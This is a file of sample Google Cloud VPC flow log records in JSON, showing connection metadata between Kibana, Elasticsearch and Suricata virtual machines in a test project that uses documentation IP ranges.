-{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"203.0.113.134","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"203.0.113.134","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"203.0.113.134","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.0.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"203.0.113.134","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"203.0.113.134","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"203.0.113.134","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"203.0.113.134","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 